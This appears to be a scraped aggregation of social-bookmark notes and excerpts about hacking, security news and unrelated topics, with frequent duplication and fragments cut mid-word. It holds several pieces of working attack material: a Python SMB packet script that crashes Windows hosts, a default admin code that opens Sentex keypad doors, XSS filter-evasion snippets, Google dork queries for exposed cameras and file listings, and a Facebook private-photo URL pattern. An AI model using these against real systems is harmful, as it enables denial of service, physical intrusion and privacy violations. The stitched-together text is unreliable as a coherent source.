I-Hacked.com Taking Advantage Of Technology - Inside Programmable Road Signs
http://www.i-hacked.com/content/view/274/48/

how to hack the ADCO portable sign

How many times have you driven by an electronic road sign like one of these? This is the ADDCO portable sign. Today, you see what is on the inside, and how they are programmed to display important information.

How to hack US roadside signs.

How the Amish live against tide of technology.

Amish Hackers - Adopting Technology

For the sake of proof-of-concept, I'm glad the Amish exist. "Ivan is an Amish alpha-geek. He is always the first to try a new gadget or technique. He gets in his head that the new flowbitzmodulator would be really useful. He comes up with a justification of how it fits into the Amish orientation. So he goes to his bishop with this proposal: "I like to try this out." Bishop says to Ivan, "Okay Ivan, do whatever you want with this. But you have to be ready to give it up, if we decide it is not helping you or hurting others.""

Great article on the Amish community discernment process for adopting technology. Dispels a lot of myths, and gives a lot to think on.

Amish use the web at libraries (using but not owning). From cubicles in public libraries Amish sometimes set up a website for their business. So while Amish websites seem like a joke, there's quite a few of them. What about post-modern innovations like credit cards? A few Amish got them, presumably for their businesses at first. But over time the bishops noticed problems of overspending, and the resultant crippling interest rates. Farmers got into debt, which impacted not only them but the community since their families had to help them recover (that's what community and families are for). So, after a trial period, the elders ruled against credit cards. One Amish-man told me that the problem with phones, pagers, and PDAs (yes he knew about them) was that "you got messages rather than conversations." That's about as an accurate summation of our times as any. Henry, his long white beard contrasting with his young bright eyes told me, "If I had a TV, I'd watch it."

One Amish-man told me that the problem with phones, pagers, and PDAs (yes he knew about them) was that "you got messages rather than conversations." That's about as an accurate summation of our times as any.

Playing restricted music works only with Premium accounts.

While Spotify is totally awesome, it currently only runs on Windows and Mac OS X (and Linux, if you can live with WINE). We wanted to be able to use Spotify in more operating systems and in more products. Let's just agree on the fact that it would be awesome if your random open source media center solution could do Spotify too!

Works with premium accounts.

Ohjelma ohittaa maakohtaiset rajoitteet, mutta puhtaasti kohteliaisuudesta palvelua kohtaan toimii vain maksullisilla Premium-tunnuksilla.

The US National Security Agency has helped put together a list of the world's most dangerous coding mistakes.

funny article

25 common coding mistakes, eg CWE-426: Untrusted Search Pat

PHPBB user's password pattern

Hilarious analysis of how people choose their (extremely naive) passwords

Dark Reading | Security | Protect The Business - Enable Access

A popular Website, phpbb.com, was recently hacked. The hacker published approximately 20,000 user passwords from the site. This is like candy to us security professionals because it's hard data we can use to figure out how users choose passwords. I wrote a program to analyze these passwords looking for patterns, and came up with some interesting results.

Analysis of PHBB passwords - interesting observations on some password choices

<tm> http://www.darkreading.com/blog/archives/2009/02/phpbb_password.html

The DNS Dead Drop Storing Arbitrary Messages in Remote DNS Caches A few months ago, I read Dan Kaminsky's presentation slides, Attacking Distributed Systems: The DNS Case Study. In the presentation, Kaminsky documents a method of implementing single bit data transfer with nothing more than: * A recursive, caching name server * A wildcard zone After a particularly stressful week, I decided I needed to work on something fun -- an implementation of a DNS-based dead drop messaging system, utilizing Kaminsky's ideas.

DNS Dropzone Storing Arbitrary Messages in Remote DNS Caches A few months ago, I read Dan Kaminsky's presentation slides, Attacking Distributed Systems: The DNS Case Study. In the presentation, Kaminsky documents a method of implementing single bit data transfer with nothing more than:

DNS Dead Drop

The DNS Dead Drop

Using tunneling over DNS or ICMP

Hacking Education article part 2

Last fall I wrote a post on this blog titled Hacking Education. In it, I outlined my thoughts on why the education system (broadly speaking) is failing our society and why hacking it seems like both an important and profitable endeavor.

Big takeaways on changing education

talked about hacking education for six hours.

How education is changing. Annotated link http://www.diigo.com/bookmark/http%3A%2F%2Fwww.avc.com%2Fa_vc%2F2009%2F03%2Fhacking-education-continued.html

What will education be like in the (near) future?

The Spanner - XSS Rays

List of most commonly used passwords

A detailed password analysis of compromised passwords from myspace, phpbb, and singles.org

Singles.orgのパスワード、やけに宗教的な語句が多いなと思ったら、キリスト教徒用出会いサイトなのね

How to open many keypad-access doors 03/11/2009 27 Comment(s) Here's a fun little tip: You can open most Sentex key pad-access doors by typing in the following code: ***00000099#* The first *** are to enter into the admin mode, 000000 (six zeroes) is the factory-default password, 99# opens the door, and * exits the admin mode (make sure you press this or the access box will be left in admin mode!) I'm not sure how prevalent they are, but here in San Francisco, Sentex building access systems seem to be the most popular.

Default-password fail.

Cyberspies have penetrated the U.S. electrical grid and left behind software that could be used to disrupt the system.

eek

Unresolvable

Parece coisa de filme !

It all started while we were researching an article on future user interfaces. Touch interfaces are hardly futuristic at this point, but multi-touch hardware like the Microsoft Surface or the iPhone is just starting to become a big deal, and we decided to see what big things are going on in that field. What we found that surprised us the most wasn’t anything about the future of multitouch; it was about something that people are doing right now.

The hackers knocked Rain down the list for moot! ...But it's still a sick hack.:B

In "the Time.com 100 Poll where millions have voted on who are the world’s most influential people in government, science, technology and the arts ... we find a Message embedded in the results ... Looking at the first letters of each of the top 21 leading names in the poll we find the message “marblecake, also the game”. The poll announces (perhaps subtly) to the world, that the most influential are not the Obamas, Britneys or the Rick Warrens of the world, the most influential are an extremely advanced intelligence: the hackers. ... At the core of the hack is the work of a dozen or so, backed by an army of a thousand who downloaded and ran the autovoters and also backed by an untold number of others that unwittingly fell prey to the spam url autovoters. So why do they do it? Why do they write code, build complex applications, publish graphs - why do they organize a team that is more effective than most startup companies? Says Zombocom: “For the lulz”."

Anon hacks Time's 100 Poll so hard

There’s a scene toward the end of the book Contact by Carl Sagan, where the protagonist Ellie Arroway finds a Message embedded deep in the digits of PI. The Message is perhaps an artifact of an extremely advanced intelligence that apparently manipulated one of the fundamental constants of the universe as a testament to their power as they wove space and time. I’m reminded of this scene by the Time.com 100 Poll where millions have voted on who are the world’s most influential people in government, science, technology and the arts. Just as Ellie found a Message embedded in PI, we find a Message embedded in the results of this poll. Looking at the first letters of each of the top 21 leading names in the poll we find the message “marblecake, also the game”. The poll announces (perhaps subtly) to the world, that the most influential are not the Obamas, Britneys or the Rick Warrens of the world, the most influential are an extremely advanced intelligence: the hackers. kg9kl At 4AM this mor

Nifty utility to become root on a box.

Introduction I love to use JavaScript in unexpected ways, to create code that looks like it shouldn't work but does, or produces some unexpected behavior. This may sound trivial, but the results I've found lead to some very useful techniques. Each of the techniques described can be used for XSS filter evasion, which was my original intention when developing them. However, learning such JavaScript can dramatically increase your knowledge of the language, helping you become better at cleaning up input, and increase web application security. So read on and enjoy my weird and wonderful JavaScript hacks. RegExp replace can execute code When using regular expressions with replace the second argument supports a function assignment. In Opera it seems you can use this argument to execute code. For example, check out the code snippet below: 'XSS'.replace(/XSS/g,alert) This results in alert('XSS'); this works because the match from the RegExp is passed to the alert function as an argument. N

I love to use JavaScript in unexpected ways, to create code that looks like it shouldn't work but does, or produces some unexpected behavior. This may sound trivial, but the results I've found lead to some very useful techniques. Each of the techniques described can be used for XSS filter evasion, which was my original intention when developing them. However, learning such JavaScript can dramatically increase your knowledge of the language, helping you become better at cleaning up input, and increase web application security.

A team of pranksters found a way to control the Time top 100 influential people list... I guess this demonstrates that they are in-fact "influential"...

programming hacking

from ibm developerworks

Top 10 Programming Fonts

Here’s a round-up of the top 10 readily-available monospace fonts for your coding enjoyment, with descriptions, visual examples and samples, and download links for each.

list of fonts

Dan Benjamin's top 10 list of monospace fonts for development

プログラミング向けフォント10

It has been two months since we hosted a great group of academics, entrepreneurs, educators, and administrators at our Union Square Sessions Event, Hacking Education. Fred posted his initial thoughts immediately after the event and in a great example of peer production, Alex Krupp curated the Twitter stream that captured the thoughts of folks inside and outside of the event. I finally found some quality time to spend with the transcript that is now online, and thought I would try to expand on Fred's initial thoughts and develop a couple of the key themes that came out of the conversation. Before diving in, however, I'd like to make a pitch for the transcript. It is not perfect (imagine trying to record 40 high powered people all talking at once), but it is readable and full of lots of insights. I would encourage anyone who is interested in the impact of technology on education to plow through it. I have tried to pull some of the highlights here, but there is no way that even this over

There was broad consensus that the internet is enabling substantial changes in the way we learn and teach. It has always been possible to learn outside of a school setting. The ubiquitous connectivity and very low cost of content production and distribution seems to enable the unbundling of key components of education.

Summary of a meeting on how technology could "reinvent" education. Topics include open courseware, game curriculum, reducing marginal cost of education to zero if viewed as an information good, etc. Tiny gem is Danah Boyd's comments which explain why the OLPC project has run into problems overseas.

This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured. The report concludes that who is in control of GhostNet is less important than the opportunity for generating st

This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured.

e locks and hotel room safes: These days, Tobias is attacking the lock famous for protecting places li

Get Wired's take on technology business news and the Silicon Valley scene including IT, media, mobility, broadband, video, design, security, software, networking and internet startups on Wired.com

Thinking like a criminal is Tobias' idea of fun. It makes him laugh. It has also made him money and earned him a reputation as something of the Rain Man of lock-breaking. Even if you've never heard of Tobias, you may know his work: He's the guy who figured out how to steal your bike, unlock your front door, crack your gun lock, blow up your airplane, and hijack your mail. Marc Weber Tobias has a name for the headache he inflicts on his targets: the Marc Weber Tobias problem.

"Marc Weber Tobias can pick, crack, or bump any lock. Now he wants to teach the world how to break into military facilities and corporate headquarters."

An article about someone with a gift for picking locks.

Tobias is laughing. And laughing. The effect is disconcerting. It's a bwa-ha-ha kind of evil mastermind laugh—appropriate if you've just sacked Constantinople, checkmated Deep Blue, or handed Superman a Dixie cup of kryptonite Kool-Aid, but downright scary in a midtown Manhattan restaurant during the early-bird special. Our fellow diners begin to stare. Tobias doesn't notice and wouldn't care anyway. He's as rumpled and wild as a nerdy grizzly bear. His place mat is covered in diagrams and sketched floor plans and scribbled arrows. His laugh fits him like a

good coders code, great reuse

You already know that if you want to lock down your Wi-Fi network, you should opt for WPA encryption because WEP is easy to crack. But did you know how easy? Take a look.

article on lockpicker Marc Weber Tobias

Marc Weber Tobias can pick, crack, or bump any lock. Now he wants to teach the world how to break into military facilities and corporate headquarters.

Wired.com: The Ultimate Lock Picker Hacks Pentagon, Beats Corporate Security for Fun and Profit - http://bit.ly/fSW4Q (via @BlackHatEvents) [from http://twitter.com/jkordish/statuses/1997565339]

Pretty discouraging article about the efficacy of locks beyond keeping honest people honest.

I was reading an article on "Lambda the Ultimate" about Bruce Mills's book "A Theoretical Introduction to Programming," and in particular about the difference between "menu-lookup" writing of glue code, and "real programming", which the author defines as "to increase the computational capacity, to begin with a set of operations, and develop them into new operations that were not obviously implicit in the original set."

A really nice and introspective peek into Kragen's development as a programmer. Lots of nice insights.

Educational hacking comic from Korea that writes up how to solve a DEFCON challenge.

Blind kid & genius phone hacker

Conectate a cualquier sitio que necesite user & password

This service is made for you to save your time on registration for many sites. You can not register at all sites, so just type the name of site for which you need to enter login and password and click «Get».

So it takes about 25 kilobits — 3.2 kbytes — of data to code for a virus that has a non-trivial chance of killing a human.

If you're using Firefox's built-in password management, you should also be using its master password feature to protect your saved passwords from prying eyes. But what happens if you lose your master password?

If you&#039;re using Firefox&#039;s built-in password management, you should also be using its master password feature to protect your saved passwords from prying eyes. But what happens if you lose your master password?

s: we want choice. We believe that Apple has m

74.208.105.171 gs.apple.com

Metasploit Bible (free)

Artikel über einen Botnet Master, Der via MSN von einem Cisco Experten Interviewt wurde. Bsonders interessant sind die Motive, warum Er keinen "normalen" Job annimmt.

GR: Infiltrating a Botnet - Cisco Systems http://bit.ly/1jHXy6 [from http://twitter.com/robinhowlett/statuses/3516971966]

Technical, but interesting read.

Timing Attacks

To discover great hacks, we must always be searching for the true nature of our reality

An interesting perspective on hacking and systems, particularly relevant to the Saving Game

Cheap Arduino wireless communications

I was looking for a way to handle wireless communications between two Arduino boards. Other options like Xbee or Bluetooth were going to cost $50 to over $100. Then I found a cheap RF transmitter and receiver at Sparkfun. The total cost is only $9!

Using a password sniffer to get around full disk encryption.

The deliberate cultivation of individual creativity may end up being the most important social result of computer technology. Either that, or cottage programmers like myself will simply have more time to cultivate our gardens

You may have heard about me. In the computer business I'm known as the Oregon Hermit. According to rumor, I write personal computer programs in solitude, shunning food and sleep in endless fugues of work. I hang up on important callers in order to keep the next few programming ideas from evaporating, and I live on the end of a dirt road in the wilderness. I'm here to tell you these vicious rumors are true.

yed images and messages. In one of the sequences a cabin appeared on a hilltop, the door opened, then music played. It was designed to persuade a certain someone to visit me

Foro de preguntas y respuestas para circuitos integrados

Chiphacker is a collaboratively edited question and answer site for electronics hackers – regardless of platform or language. It's 100% free, no registration required.

use ldd to hack system

How Twitter was hacked.

net stop

In the past year, researchers have developed technology that makes it possible to use thoughts to operate a computer, maneuver a wheelchair or even use Twitter — all without lifting a finger. But as neural devices become more complicated — and go wireless — some scientists say the risks of “brain hacking” should be taken seriously.

scientists say the risks of “brain hacking” should be taken seriously.

you know...we really should call it 'Ghost-hacking'...

RT @wiredscience: The next target for hackers could be your brain. http://is.gd/1svMA [from http://twitter.com/reinikainen/statuses/2557678128]

Computer security for prosthetics http://www.wired.com/wiredscience/2009/07/neurosecurity/ [from http://twitter.com/JacksonATL/statuses/2621731930]

Computer Search Engine

SHODAN lets you find servers/ routers/ etc. The data in the index covers web servers, FTP, Telnet and SSH services.

SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Let me know which services interest you the most and I'll prioritize them in my scanning.

Welcome | sugru | Hack Things Better

Sugru is workable silicone (similar appearance to modeling clay) that will cure/harden in air under normal temperature. Use it anywhere you otherwise would need silicone rubber. It can be put in the dishwasher and I believe you could even cook with it.

Why are so many mass-produced products just so bad? Uncomfortable tin openers, leaky trainers, they get our goat! Why should you have to spend £20 on a designer tin opener?? You shouldn't! Hack the one you have instead.

latex style modelling/bonding clay for making stuff better (or fixing stuff)

OpenDPI - The Open Source Deep Packet Inspection Engine

OpenDPI is a software library designed to classify Internet traffic according to network protocols. For this purpose mainly deep packet inspection (DPI) is used. OpenDPI is derived from PACE, the traffic classification engine of ipoque, a provider of carrier!grade DPI and bandwidth management solutions. In contrast to ipoque's PACE engine, OpenDPI does not support the detection of encrypted protocols and it does not use any heuristic and behavioral analysis for classification.

OpenDPI is a software component for traffic classification based on deep packet inspection.

via http://blogs.microsoft.co.il/blogs/sasha/archive/2009/09/06/exploitable-crash-analyzer.aspx

なるほど。メールアカウント乗っ取りからすべて始まったのか。

クラウドサービスのセキュリティ、秘密の質問、他のサービスのIDにリセットされたパスワードを送る、IDでIDの正当性を証明、ユーザが持つ複数のIDのうち１個のパスワードを破ればよい、蟻の一穴、ウィルス対策と同じ

攻撃手口

The collected works of Mr Stiff.

Militants in Iraq have used $26 off-the-shelf software to intercept live video feeds from U.S. Predator drones, potentially providing them with information they need to evade or monitor U.S. military operations. Senior defense and intelligence officials said Iranian-backed insurgents intercepted the video feeds by taking advantage of an unprotected communications link in some of the remotely flown planes' systems. Shiite fighters in Iraq used software programs such as SkyGrabber -- available for as little as $25.95 on the Internet -- to regularly capture drone video feeds, according to a person familiar with reports on the matter. some officials to conclude that militant groups trained and funded by Iran were regularly intercepting feeds. A Reaper costs between $10 million and $12 million each and is faster and better armed than the Predator

Shiite fighters in Iraq used software programs such as SkyGrabber -- available for as little as $25.95 on the Internet -- to regularly capture drone video feeds, according to a person familiar with reports on the matter.

Militants in Iraq have used inexpensive, off-the-shelf software to intercept video feeds from Predator drones.

US Aircrafts hacked by Insurgents from Iraq

We have identified a vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites. As a proof of concept we executed a practical attack scenario and successfully created a rogue Certification Authority (CA) certificate trusted by all common web browsers. This certificate allows us to impersonate any website on the Internet, including banking and e-commerce sites secured using the HTTPS protocol.

Cydia is a company that makes apps. that cannot be used by i-phones unless you do some thing called jail breaking. Cydia is rebelling against apple because they took off useful apps. Cydia is making apps. to replace the ones removed and also adding new ones to.

Windows Exploit Programming Primer Tutorial

If you allow applications to save your passwords, anyone with physical access to your PC can decode them unless you're properly encrypting them—and chances are pretty good you're not. Let's walk through the right and wrong ways to store your passwords.

If you allow applications to save your passwords, anyone with physical access to your PC can decode them unless you&#039;re properly encrypting them&mdash;and chances are pretty good you&#039;re not. Let&#039;s walk through the right and wrong ways to store your passwords.

ponder

Penetration Testing and Vulnerability Analysis

Innovative course at NYU-Poly that discusses Penetration Testing and Vulnerability Analysis . The course is split into six 2 week modules where an industry expert comes in and teachers a portion of the course. The website has all the course materials and even some of the lectures in video format.

Well, it could come in handy for *something*, right?

how to pick a lock!

Crack a Wi-Fi Network's WEP Password with BackTrack, the Fancy Video Version - Security - Lifehacker

Last summer we detailed how to crack a Wi-Fi network's WEP password using BackTrack. Now video blog Tinkernut revisits the subject with a great video step-by-step of the process.

When DVD Jon was arrested after breaking the CSS encryption algorithm, he was charged with “unauthorized computer trespassing.” That led his lawyers to ask the obvious question, “On whose computer did he trespass?” The prosecutor’s answer: “his own.”

Ongoing analysis of the iPad and how it relates to programming and hacking.

Once upon a time, Apple made the machines that made me who I am. I became who I am by tinkering. Now it seems they’re doing everything in their power to stop my kids from finding that sense of wonder. Apple has declared war on the tinkerers of the world. With every software update, the previous generation of “jailbreaks” stop working, and people have to find new ways to break into their own computers. There won’t ever be a MacsBug for the iPad. There won’t be a ResEdit, or a Copy ][+ sector editor, or an iPad Peeks & Pokes Chart. And that’s a real loss. Maybe not to you, but to somebody who doesn’t even know it yet.

Another treatise on the effect that corporate content owners are having on our society. Does freedom have a chance, or will we live in a 100% copy-protected world?

"I still remember what it felt like when I realized that you — that I — could get this computer to do anything by typing the right words in the right order and telling it to RUN and it would motherfucking run. That computer was an Apple ][e." Mark Pilgrim's take on the iPad as a locus of Apple's control.

Official misuses are bad enough, but it's the unofficial uses that worry me more. Any surveillance and control system must itself be secured. An infrastructure conducive to surveillance and control invites surveillance and control, both by the people you expect and by the people you don't. The problem is that such control makes us all less safe. Whether the eavesdroppers are the good guys or the bad guys, these systems put us all at greater risk. Communications systems that have no inherent eavesdropping capabilities are more secure than systems with those capabilities built in. And it's bad civic hygiene to build technologies that could someday be used to facilitate a police state.

Bajo el título amarillista "USA habilita hackeo de China a Google" hay un buen artículo, lleno de info importante. http://bit.ly/64uzts [from http://twitter.com/dariuus/statuses/8156429222]

"In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access. Google's system isn't unique. Democratic governments around the world -- in Sweden, Canada and the UK, for example -- are rushing to pass laws giving their police new powers of Internet surveillance, in many cases requiring communications system providers to redesign products and services they sell."

Schneier on how the mandated backdoor access system allowed for the China incident

articulo de Bruce Scheneier sobre el ataque de china a google. video hillary clinton sobre la libertad de internet

RT @dangoldin: RT @mikkohypponen: Bruce Schneier writes to CNN on Google & China http://bit.ly/6uMYkx [from http://twitter.com/davidajudd/statuses/8152550494]

In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access.

Smb-Bsod.py: #!/usr/bin/python from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()

This is why we do regression testing, folks!

when it comes to login pages where our most sensitive data are being held. Hence, there is a need to better understand how well your login page has been implemented to be considered as really secure. In this article, you will get a list of PHP secure login tips and tricks that will definitely help you decide on your secure rating of your login page.

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3) "<BANDNAME/SONG>"

"-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(wma|mp3) "<BANDNAME/SONG>""

Googleをハッキングするというと大げさですが、「ハッキング・グーグル：GoogleをMP3ダウンローダーに変えてしまう」という興味深い記事が海外で注目を集めているようです。

GoogleをハッキングしてMP3をダウンロードする方法

How I Hacked Hacker News (with arc security advisory)

410 financial institutions

Researchers hijack botnet, score 56,000 passwords in an hour - Ars Technica http://ow.ly/5eyt [from http://twitter.com/ChipRiley/statuses/1706638693]

“The Torpig botnet was hijacked by the good guys for ten days earlier this year before its controllers issued an update and took the botnet back. During that time, however, researchers were able to gain a glimpse into the kind of information the botnet gathers as well as the behavior of Internet users who are prone to malware infections. ” – via nelson

How many times have you driven by an electronic road sign like one of these? This is the ADDCO portable sign. Today, you see what is on the inside, and how they are programmed to display important information.

this is how they did the zombies ahead thing

road sign programming

example backend for twitter with Britney Spears info

It don't need to be pretty (though that helps), but it does need to work.

Francophone geek site Nowhere Else says hackers sent them screenshots from the site Twitter employees use to manage the microblogging service, admin.twitter.com.

...hackers sent them screenshots from the site Twitter employees use to manage the microblogging service, admin.twitter.com... [It's amazing to see all of the back-end stuff necessary to run something so "simple" as Twitter.]

Hacker war drives San Francisco cloning #RFID passports http://j.mp/cQh2ro

an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a r

Software om webapplications te testen, ook op beveiliging

「・・・skipfish - web application security scanner・・・」

Security checks and link extraction for third-party, plugin-based content (Flash, Java, PDF, etc).

Security

f you invited me to try and crack your password, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?

sudo dtrace -n 'syscall::write*:entry /execname == "Spotify" && arg0 == 2/ { trace(copyinstr(arg1)); ustack(); }'

"Spotify for Windows contains code so awesome that [Windows debugger] OllyDbg can't look at it without crashing."

Spotify for Windows contains code so awesome that OllyDbg can't look at it without crashing.

GReader: The Great Brazilian Sat-Hack Crackdown [feedly] http://ow.ly/3ipE [from http://twitter.com/ChipRiley/statuses/1563319028]

Much of this country's geography is remote, and beyond the reach of cellphone coverage, making American satellites an ideal, if illegal, communications option.

An article on how Brazilian satellite hackers use high-performance antennas and homebrew gear to turn U.S. Navy satellites into their personal CB radios.

Brazilian satellite hackers use high-performance antennas and homebrew gear to turn U.S. Navy satellites into their personal CB radios.

There is a growing belief among engineers and security experts that Internet security and privacy have become so maddeningly elusive that the only way to fix the problem is to start over. What a new Internet might look like is still widely debated, but one alternative would, in effect, create a “gated community” where users would give up their anonymity and certain freedoms in return for safety.

Problems with privacy are making experts to think about a new inertenet. Question to the class: Is it possible?

"there is a growing belief among engineers and security experts that Internet security and privacy have become so maddeningly elusive that the only way to fix the problem is to start over.""A more secure network is one that would almost certainly offer less anonymity and privacy."

"What a new Internet might look like is still widely debated, but one alternative would, in effect, create a “gated community” where users would give up their anonymity and certain freedoms in return for safety. Today that is already the case for many corporate and government Internet users. As a new and more secure network becomes widely adopted, the current Internet might end up as the bad neighborhood of cyberspace. You would enter at your own risk and keep an eye over your shoulder while you were there"

Do We Need a New Internet?

Do We Need a New Internet? http://tinyurl.com/cdgwv4 via NYT [from http://twitter.com/bibliothekarin/statuses/1218288148]

How Your Password Could Be Hacked: http://j.mp/9LPHl1 #it

Internet standards expert, CEO of web company iFusion Labs, and blogger John Pozadzides knows a thing or two about password security&mdash;and he knows exactly how he&#039;d hack the weak passwords you use all over the internet.

The tool is called depant ((DE)fault (PA)ssword (N)etwork (T)ool). Depant works by downloading a default password list, and then mapping out the local network to see what open services are available. Once it has a list of services, it will test each service for default passwords. Once it’s gone through each of the services, depant will determine the fastest service (as recorded in phase one) and use it to perform an optional second phase of tests with a larger (user-supplied) set of default users/passwords.

depant

WEEK 12 -- 04/14/2010

Much ado about NULL: Exploiting a kernel NULL dereference

I’ve always wanted my own supercomputer. Let’s be honest, what self-respecting geek doesn’t? Unfortunately, I’m usually poor, and I live in a space that’s ~300 ft^2 (that I share with someone else), so actually owning anything considered a supercomputer is out of the question. Fortunately, “Supercomputers” from the 1980’s weren’t actually all that complicated, and cheap FPGA boards have gotten pretty good. And thus, I give you the Non-Von1. What is the Non-Von 1? For those out there that love both retro computing and weird computer architectures, this one is for you. The “Non-Von” was a “Non-Von Neumann” computer that came out of Columbia University in the early 1980’s.

A supercomputer that does NOT use the Von Neumann architecture...lemme at it!

I’ve always wanted my own supercomputer. Let’s be honest, what self-respecting geek doesn’t? Unfortunately, I’m usually poor, and I live in a space that’s ~300 ft^2 (that I share with someone else), so actually owning anything considered a supercomputer is out of the question. Fortunately, “Supercomputers” from the 1980’s weren’t actually all that complicated, and cheap FPGA boards have gotten pretty good. And thus, I give you the Non-Von1.

e session cookies for every photo request, but we’ll assume this is impractical giv

Last March, Facebook caught some flak when some hacks circulated showing how to access private photos of any user. These were enabled by egregiously lazy design: viewing somebody’s private photos simply required determining their user ID (which shows up in search results) and then manually fetching a URL of the form: www.facebook.com/photo.php?pid=1&view=all&subj=[uid]&id=[uid] This hack was live for a few weeks in February, exposing some photos of Facebook CEO Mark Zuckerberg and (reportedly) Paris Hilton, before the media picked it up in March and Facebook upgraded the site. Instead of using properly formatted PHP queries as capabilities to view photos, Faceook now verifies the requesting user against the ACL for each photo request. What could possibly go wrong? Well, as I discovered this week, the photos themselves are served from a separate content-delivery domain, leading to some problems which

9000, which can be searched in about 45 minutes using one script. This is also easily parallelisable, given that we can query any of the mirrored photo servers in the

inurl:”viewerframe?mode=motion”

intitle:Live View / AXIS

?intitle:index.of?mp3 Linkin Park

“?intitle:index.of?mp3 Linkin Park“

"This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following"

When you don’t create things, you become defined by your tastes rather than ability. Your tastes only narrow and exclude people. so create. — Why the Lucky Stiff

RT @puredanger: beautiful portrait of _why: http://is.gd/cb25U a reminder to make art of your life.

Palin E-Mail Hacker Says It Was Easy

Email hacking is taken too far.

Palins e-mail was hacked into not with expert knowledge of computer systems, but rather a well thought out trick to recover her account password. This just goes to show information is power. People can find personal information on many other people in the world. If this information gets into the wrong hands, there are ways to it may be used against you.

"hacker" said it was easy. Haha.

Jailbreaking an iPhone constitutes copyright infringement and a DMCA violation, says Apple in comments filed with the Copyright Office as part of the 2009 DMCA triennial rulemaking. This marks the first formal public statement by Apple about its lega...

Fud!

Increase Firefox speed by 10-30x

@caryblack Makes me paranoid. http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

Tabnabbing: A New Type of Phishing Attack - via @dustice http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

.

The Print Magazine of Hacker News

All being well, I should be an advertiser in the 2nd issue of Hacker Monthly: http://hackermonthly.com/ (an awesome new geek magazine) – Peter Çoopèr (peterc) http://twitter.com/peterc/statuses/15814308295

RT @joacim_boive: Google Code University: Web Application Exploits and Defenses http://bit.ly/hacking_web

A book crowdsourced in one week may 21-28 2010

A Ubuntu-based GNU/Linux distribution targeted on analyzing malware.

REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.

REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and is maintained by Lenny Zeltser.

REMnux

A Ubuntu-based GNU/Linux distribution targeted on analyzing malware.

REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.